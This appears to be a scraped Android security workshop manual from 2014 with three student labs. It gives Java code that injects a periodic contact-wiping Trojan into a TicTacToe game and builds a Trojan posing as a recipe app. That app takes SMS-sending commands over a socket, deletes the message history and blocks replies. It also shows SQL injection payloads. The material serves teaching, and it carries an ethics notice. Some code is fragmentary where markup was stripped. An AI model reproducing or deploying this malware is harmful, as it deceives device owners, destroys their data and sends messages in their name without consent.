[Type the company name] nsf mobile Security Workshop 2014
Lab 3 Malware Game – Step by Step demonstration
Download 312.97 Kb.
|
- Navigate this page:
- Lab 4 Malware-Trojan
- The Development of the Android Trojan
- Lab 4 Step-by-Step Demonstration
- Lab 5 Database Security
Lab 3 Malware Game – Step by Step demonstrationIn this lab, we will practice the injection of malicious code into a benign TicTacToe Game. The malicious code will periodically erase all the contacts on device. Step 1: Start an emulator and Add Contacts In Eclipse, follow the steps in the screenshot below to start an Emulator using AVD “Test” 
The emulator may take several minutes to start. After it starts, click the button in the middle to check the installed apps on device. 
Click “Contacts” to check the contact list on device. 
In the beginning, the contact list is empty, and we can first click the “Menu” in the right panel, and then click the “New Contact” button to create new contacts. 
Enter the name for a new contact and press done. 
Now, you shall see the new contact in your contact list. 
Step 2: Load benign TicTaeToe Game into Eclipse The eclipse project “MalTicTaeToe” under the folder “\Lab3\Before Injecting Malicious Code\” contains a benign TicTaeToe game. Import the project into eclipse. In eclipse, click “File” -> “Import” 
In the “Import” dialog, select “Android” -> “Existing Android Code into Workspace”, and then click “Next” 
Browse to the foler of “MalTicTacToe” under “Lab3\Before Injecting Malicious Code\”. Check “Copy Projects into workspace” and Click “Finish” to complete the import. 
The imported project would look like the screenshot below. 
Step 3: Install the benign TicTacToe to the emulator 
The Game will automatically start, and you can play the TicTacToe game  
Check the contact list (refer to Step 1), the previously created contact should still exist. Close the emulator and start it again; the contact list should remain unchanged. Step 4: Inject Malicious Code Open the configuration file: AndroidManifest.xml 
Add permission requests (orange color) and two Receiver components (blue color) to the AndroidManifest.xml Code 3.1 android:versionCode="1" android:versionName="1.0" > android:targetSdkVersion="10" />
android:allowBackup="true" android:icon="@drawable/ic_launcher"
android:label="@string/app_name" android:theme="@style/AppTheme" >
android:name="edu.mobilesecuritylabware.malware.maltictactoe.tictactoe.MainActivity" android:label="@string/app_name" >
Next, we will add the java code for the two new components. Create a new package with the name “edu.mobilesecuritylabware.malware.maltictactoe.trojan” 
Add a new Java class “RunTrojan” to the new package 
Repeat the same steps to add another class “StartAttack” to the new package. 
Replace the code in RunTrojan.java with Code 3.2 Code 3.2 package edu.mobilesecuritylabware.malware.maltictactoe.trojan; import android.app.Activity; import android.content.BroadcastReceiver; import android.content.ContentResolver; import android.content.Context; import android.content.Intent; import android.database.Cursor; import android.net.Uri; import android.provider.ContactsContract; import android.util.Log; public class RunTrojan extends BroadcastReceiver{ @Override public void onReceive(Context context, Intent intent) { Log.i("LOG", "deleteContacts"); ContentResolver contentResolver = context.getContentResolver(); Cursor cursor = contentResolver.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null); while (cursor.moveToNext()) { String lookupKey = cursor.getString(cursor.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY)); Uri uri = Uri.withAppendedPath(ContactsContract.Contacts.CONTENT_LOOKUP_URI, lookupKey); Log.i("LOG", uri.toString()); contentResolver.delete(uri, null, null); } }
Replace the code in StartAttack.java with Code 3.3
import android.app.AlarmManager; import android.app.PendingIntent; import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; import android.util.Log; public class StartAttack extends BroadcastReceiver { private static final long TIME = 5000;//??how long? Calendar cal=Calendar.getInstance(); private static int count=0; @Override public void onReceive(Context context, Intent arg1) { Log.i("StartAttack", "onReceive"); AlarmManager service = (AlarmManager) context .getSystemService(Context.ALARM_SERVICE); Intent i = new Intent(context, RunTrojan.class); PendingIntent pending = PendingIntent.getBroadcast(context, 0, i, PendingIntent.FLAG_CANCEL_CURRENT); service.setInexactRepeating(AlarmManager.RTC_WAKEUP, cal.getTimeInMillis(), TIME, pending); Log.i("StartAttack", count++ +" times"); } }
In emulator, open the “Settings” -> “Applications” -> “Manage Applications” -> “TrojanGame” -> “Uninstall” 
 
 
Step 6. Install the TicTacToe with the malicious code In eclipse, install the MalTicTacToe to the emulator (refer to Step 3) After the installation, the main activity of malicious TicTactoe will be invoked. Play the game and exit the game. Check the contacts. The contact list should remain unchanged. 
Close the emulator and start the emulator again. Check the contacts. All contacts shall be removed. 
You can add contact again (refer to Step 1) and they shall be quickly removed. Lab 4 Malware-TrojanObjective In this lab, we will develop an Android Trojan from scratch to demonstrate the concept of Mobile Malware on Android platform. The main functionality of this Android Trojan is sending text messages to others according to a hacker's commands. In order to make the user unconscious of the malicious activities, this Trojan will delete all the messaging history. The diagram below illustrates the work flow of this Android Trojan. 
Special Notice The Android Trojan developed in this lab is for education purpose. Readers should perform gracefully based on hacking ethics and should not spread or utilize the code in this lab to harm other Android phone users to gain their own benefits. A more thorough specification of hacking ethics can be found here and here. Please read them carefully. The Development of the Android TrojanThe appearance of this Trojan is an introduction to an Asian dish, Hong Shao Shi Zi Tou. We assume that the victim is interested in Asian food and she has downloaded this app carelessly. When the victim activates the application, the Trojan will send a notification to the hacker, which encodes the information of the user's IP address and a port number for malicious communication. Then, the Trojan and the hacker are able to set up a TCP/IP communication channel, via which the hacker can send commands to the Trojan on victim's device. When receive a command from the hacker, the Trojan will analyze the data packet, abstract the target users' phone numbers and the content of the malicious message, and finally send the malicious messages to the target phone users. After sending text messages, the Trojan will delete the messaging history. If the target phone users send complaint messages back to user, the Trojan will stop the arriving of those complaint messages to the users' phone. Step 1: Start Eclipse. Import the pre-lab 4.
Step 2:
Code 4.1 serverSocket = new ServerSocket(PORT); //mSocket=new Socket(SERVER,PORT); while (true) { Socket client = serverSocket.accept(); Log.i("VICTIM", "visting.."); try { // Log.i("hehheh", "visting.."); BufferedReader in = new BufferedReader( new InputStreamReader(client.getInputStream())); String str = in.readLine(); String[] tempMessage = str.split("#"); String phoneNo = tempMessage[0]; String message = tempMessage[1]; Log.i("AndroidServer", "No:" + phoneNo + " message:" + message); // Toast.makeText(MainActivity.this,"No:"+phoneNo+" message:"+message, // Toast.LENGTH_SHORT).show(); sendSMS(phoneNo, message);// send message to target deleteSMS(); } catch (Exception e) { e.printStackTrace(); } finally { client.close(); } Thread.sleep(1000); } After step 2 look like this. 
Step3:
Code 4.2 public void onReceive(Context context, Intent intent) { Log.i("SMSReceiver, isOrderedBroadcast()=" ,""+isOrderedBroadcast()); String action = intent.getAction(); if (SMS_RECEIVED_ACTION.equals(action)) { Bundle bundle = intent.getExtras(); if (bundle != null) { Object[] pdus = (Object[]) bundle.get("pdus"); for (Object pdu : pdus) { SmsMessage message = SmsMessage.createFromPdu((byte[]) pdu); String sender = message.getOriginatingAddress(); if (sender!=null&&sender.equals("15555215556")) { //deleteSMS(context,sender); abortBroadcast(); } return; } } abortBroadcast(); } } This is what you will have in SMSReceiver.java after step 3 
Step 4:
Code 4.3. >
In eclipse, open the “Android Virtual Device (AVD) Manager” by clicking Select “Test” and click “Start” button to start the emulator “Test”. Select “Test2” and click “Start” button to start the emulator “Test2”. 
Since we start the emulator “Test” first, it will be assigned with port “5554”, and the other emulator “Test2” will be assigned with port “5556”. 
Step 2: install the Malrecipe app in emulator “5554:Test” In eclipse, 
By default, MalRecipe will be installed to the first emulator, which is “5554:Test”. After the installation, we will see the Malrecipe app installed with the app name “Trojan”. 
Start Malrecipe by clicking the app “Trojan” 
After start the app, MalRecipe starts to listen to the port “7777” of Emulator “5554:Test” Step 3: Start the MalRecipeServer In eclipse, start the “MalRecipeServer” as a Java Appilcation 
And the GUI of MalRecipeServer will look like this 
In order for the MalRecipeServer to be able to connect to the port “7777” in emulator “5554:Test”, a tcp redirection will need to be set up. Open PuTTy 
Telnet to the emulator “5554:Test” 
The following window will appear 
Enter the command “redir add tcp:7777:7777” 
Step 5: Attacking In MalRecipeServer, enter the message to be sent through “5554:Test” to “5556:Test2” 
Click “Attack”. If succeed, a message will be shown. 
Checking the SMS in two emulators. We can see that “5556:Test2” received a message from “5554:Test”, however, “5554:Test” had no record of sending the message. 
Lab 5 Database SecuritySQL injection and defenseIn this tutorial, we will create a simple SQL injection application which based on the concept of SQLite Databases of Android. By doing this exercise, students will get a better understanding about the security vulnerabilities in database. Objective In Android, we have five types of way for Data Storage (Shared Preferences, Internal Storage, External Storage, SQLite Databases, Network Connection). Our goal is to fully understand the way of SQLite Databases used to store structured data in a private database and how SQL injection can be performed. Software Requirement Eclipse IDE Android SDK Tutorial
In the Input the user ID: field type 1’ or username not null – Click the Search button again and you should view the following:
Click the back button to return to the original screen. 
Now, click on the View Defense Demo You should again reach the screen where you are asked to input the user ID. We will now try to again enter 1’ or ‘1’=’1 in the Input the user ID: field.
Notice that you were not able to capture the information. You can click back and repeat the exercise using the 1’ or username not null – as the id. For the code that performs all of these operations and an explanation, please see the bound workshop manual. Directory: faculty -> li-yang faculty -> Handling Indivisibilities faculty -> Course overview faculty -> Curriculum vitae wei chen professor faculty -> Digital image warping faculty -> Samples of Elements Exam Question III contains All Prior Exam Qs III except faculty -> 【Education&Working Experience】 faculty -> References Abe, M., A. Kitoh and T. Yasunari, 2003: An evolution of the Asian summer monsoon associated with mountain uplift —Simulation with the mri atmosphere-ocean coupled gcm. J. Meteor. Soc. Japan, 81 faculty -> Ralph R. Ferraro Chief, Satellite Climate Studies Branch, noaa/nesdis faculty -> Unit IV text: Types of Oil, Types of Prices Grammar: that/those of, with revision li-yang -> Manual For Mobile Security Download 312.97 Kb. Share with your friends:
|
, and two virtual devices ( “Test” and “Test2”) have been created. 
